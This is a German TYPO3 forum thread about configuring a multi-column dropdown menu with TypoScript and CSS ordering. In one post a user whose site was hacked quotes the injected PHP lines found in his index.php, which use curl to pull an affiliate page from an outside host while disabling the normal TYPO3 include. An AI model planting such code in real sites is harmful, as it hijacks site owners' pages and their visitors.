Typoscript für Mega Dropdown Menu [Gelöst]

  • cwalter cwalter
    Padawan
    0 x
    51 Beiträge
    0 Hilfreiche Beiträge
    18. 01. 2010, 08:37

    Hallo zusammen

    Ich hab eine echte Knacknuss - zumindest für mich :). Ich bräuchte für ein mehrspaltiges Dropdown Menü folgenden generierten Code:

    [HTML]<ul id="topnav">
    <li><a href="#">Punkt 1</a></li>
    <li>
    <a href="#">Punkt 2</a>
    <div class="sub">
    <ul>
    <li><h2><a href="#">Unterpunkt 1</a></h2></li>
    <li><a href="#">Navigation Link</a></li>
    <li><a href="#">Navigation Link</a></li>
    </ul>
    <ul>
    <li><h2><a href="#">Unterpunkt 1</a></h2></li>
    <li><a href="#">Navigation Link</a></li>
    <li><a href="#">Navigation Link</a></li>
    </ul>
    </div>
    </li>
    <li><a href="#">Punkt 3</a></li>
    <li><a href="#">Punkt 4</a></li>
    <li><a href="#">Punkt 5</a></li>
    </ul>
    [/HTML]

    Allerdings bin ich mit dem hierzu notwendigen typoscript ziemlich überfordert, ich bin mir nicht einmal ganz im klaren, wie ich die einzelnen Seiten von der Hierarchie anordnen müsste, damit eine solche Struktur möglich ist (da die ersten Seiten jeder Unternavigationsgruppe jeweils noch als <h2> ausgezeichnet sein sollten). Gibt es vielleicht einen typoscript-Kenner, welcher sich ein entsprechendes TMENU vorstellen könnte?

    Grüsse
    Christoph


  • jank jank
    Sternenflotten-Admiral
    0 x
    158 Beiträge
    0 Hilfreiche Beiträge
    18. 01. 2011, 11:37

    auch wieder über die constants:

    1. plugin.freeCssDropDownMenu.themeCss = typo3conf/ext/freecssdropdownmenu/res/css/dropdown/themes/_template/default.css

  • LucitheR LucitheR
    T3PO
    0 x
    18 Beiträge
    0 Hilfreiche Beiträge
    18. 01. 2011, 13:59

    danke :)

  • Dennis.D Dennis.D
    Padawan
    0 x
    47 Beiträge
    0 Hilfreiche Beiträge
    02. 02. 2011, 17:04

    Hallo Zusammen,
    ich hoffe es liest hier noch einer mit und mir ist es auch etwas unangenehm das ich das Menü trotz so vieler Antworten noch nicht auf die Reihe bekommen habe.

    Mein Ziel: So wie in dem Celebrity Bsp, ein Menü mit mehreren Spalten nebeneinander, so das man gleich einen schönen Überblick über die Unterseiten bekommt.
    Die Unterseiten des Menüs sollen nicht Ebene für Ebene nacheinander auftauchen wenn man mit der Maus drüber fährt, sondern gleich wenn ich den ersten Menüpunkt auswähle soll darunter die mehrspaltige Liste auftauchen. Ebenso wie in dem Beispiel.

    Das "geklaute" TS:

    1. temp.nav = COA
    2. temp.nav.10 < plugin.freeCssDropDownMenu.horizontal
    3. temp.nav.10.1.wrap = <ul class="dropdown dropdown-linear dropdown-columnar"> | </ul>
    4. temp.nav.10.1.IFSUB.doNotLinkIt = 1
    5. temp.nav.10.1.expAll = 1
    6. temp.nav.10.2.IFSUB.doNotLinkIt = 1
    7. temp.nav.10.2.entryLevel = 1
    8. temp.nav.10.2.expAll = 1
    9. temp.nav.10.4 >
    10. temp.nav.10.5 >
    11. page.10.subparts.main_nav < temp.nav
    12.  
    13. page.headerData.100 = TEXT
    14. page.headerData.100.value (
    15. <link href="fileadmin/template/css/default.advanced.css" rel="stylesheet" type="text/css" />
    16. <link href="typo3conf/ext/freecssdropdownmenu/res/css/dropdown.linear.columnar.css" rel="stylesheet" type="text/css" />
    17. )

    Und hier mal der link zur Seite auf der ich das gerade ausprobiere: http://4mamis.diekavallerie.de.www68.your-server.de/

    Bin um jeden Tipp dankbar.

    LG Dennis

  • jank jank
    Sternenflotten-Admiral
    0 x
    158 Beiträge
    0 Hilfreiche Beiträge
    02. 02. 2011, 22:06

    Das Problem ist die Reihenfolge der CSS Dateien.

    Die Dateien überschreiben der Reihe nach einige Einstellungen und wenn die Reihenfolge falsch ist überschreibt die letzte Datei die Einstellungen der vorherigen.

    Hier die Reihenfolge:
    dropdown.css
    dropdown.linear.columnar.css
    default.advanced.css

    Und das Theme css unbedingt nach fileadmin kopieren, da es sonst bei einem Update überschrieben wird.

  • Dennis.D Dennis.D
    Padawan
    0 x
    47 Beiträge
    0 Hilfreiche Beiträge
    03. 02. 2011, 09:52

    Gute Morgen,

    erstmal vielen Dank für die schnelle Antwort. Ich werde das gleich mal ausprobieren.

    Ich musste gerade leider mit entsetzen feststellen das die Seite die ich gestern Abend aufgesetzt habe, und deren link ich hier gepostet habe, gehackt wurde!

    Folgenden Eintrag konnte ich im Log finden:
    20:44:54 dennis@-99 LOGIN LOGIN User dennis logged in from 109.192.130.226 () (msg#255.1.1)
    20:44:34 [0]@LIVE [5]Sys! [5_0] Core: Exception handler (WEB): Uncaught TYPO3 Exception: Reason: Segment &quot;favicon.ico&quot; was not a keyword for a postVarSet as expected! | RuntimeException thrown in file /xx/xxx/xxx/xxx/4mamis/typo3_src-4.5.0/typo3/sysext/cms/tslib/class.tslib_fe.php in line 1572

    Ich weiss nich ob jemand damit was anfangen kann. Anscheinend hat jemand meinen BE Account geknackt und hat sich dann damit um 20.44 Uhr eingeloggt.

    Die index.php war auch verändert, hiermit:

    1. $ch = curl_init();
    2. curl_setopt($ch, CURLOPT_URL, "http://www.benaughty.com/aff.php");
    3. curl_setopt($ch, CURLOPT_HEADER, 0);
    4. #require (PATH_tslib.'index_ts.php');
    5. curl_exec($ch);
    6. curl_close($ch);

    Könnte das ein TYPO3 bug in der neuen Version sein, oder habe ich einfach Pech und sollte hier solche links nicht mehr posten?

    Danke euch schon mal.

  • jank jank
    Sternenflotten-Admiral
    0 x
    158 Beiträge
    0 Hilfreiche Beiträge
    03. 02. 2011, 12:04

    hm... ich war es nicht. Aber ist schon komisch. Aber eigentlich kann es fast kein Typo3 Bug sein, da aus Typo3 die index.php zu modifizieren recht schwer sein dürfte. Vielleicht war der ganze Server betroffen...
    Das hatte ich vor kurzem auch bei einem Kunden... Da hat der Hoster einfach sch... gebaut.
    Den Ordner typo3_src sollte man am besten auch nicht vom Webserver beschreibbar machen, außer du willst wirklich am Quelltext von Typo3 etwas ändern.

  • Dennis.D Dennis.D
    Padawan
    0 x
    47 Beiträge
    0 Hilfreiche Beiträge
    03. 02. 2011, 13:08

    Das Du es nicht warst glaube ich Dir auch! ;)

    OK, also das Menü sieht nun schon besser aus. Die 3. Ebene wird sofort dargestellt, nur komme ich gerade nicht auf den Trichter welche CSS Klasse ich nun anfassen muss damit die 3. Ebene auch neben der 2. Ebene dargestellt wird. Im Moment überlappen sich beide...

    http://entwicklung.diekavallerie.de.www68.your-server.de

  • jank jank
    Sternenflotten-Admiral
    0 x
    158 Beiträge
    0 Hilfreiche Beiträge
    03. 02. 2011, 13:18

    Die Reihenfolge der CSS Dateien Stimmt immer noch nicht
    Momentan:

    1. <link href="/fileadmin/template/css/dropdown.css" rel="stylesheet" type="text/css" />
    2. <link href="/fileadmin/template/css/dropdown.linear.columnar.css" rel="stylesheet" type="text/css" />
    3. <link href="/fileadmin/template/css/default.advanced.css" rel="stylesheet" type="text/css" />
    4. <link rel="stylesheet" type="text/css" href="/typo3conf/ext/freecssdropdownmenu/res/css/dropdown/dropdown.css" /><link rel="stylesheet" type="text/css" href="/typo3conf/ext/freecssdropdownmenu/res/css/dropdown/themes/_template/default.css" />

    Da must Du die Reihenfolge beachten, wie ich es im vorherigen Post geschrieben habe.
    Bei dir überschreibt die dropdown.css die Eigenschaften der default.advanced.css und dropdown.linear.columnar.css wieder, da sie noch mal an vorletzter Stelle steht.

  • Dennis.D Dennis.D
    Padawan
    0 x
    47 Beiträge
    0 Hilfreiche Beiträge
    03. 02. 2011, 14:07

    Ich steh immer noch auf dem Schlauch... Die letzte Zeile:

    1. <link rel="stylesheet" type="text/css" href="/typo3conf/ext/freecssdropdownmenu/res/css/dropdown/dropdown.css" /><link rel="stylesheet" type="text/css" href="/typo3conf/ext/freecssdropdownmenu/res/css/dropdown/themes/_template/default.css" />

    wird ja anscheinend aus der Extension geladen. Ich habe das so nicht im TS stehen. Wie kann ich das abstellen? Egal wie ich die Reihenfolge änder, diese Zeile taucht immer als letztes auf. #angry#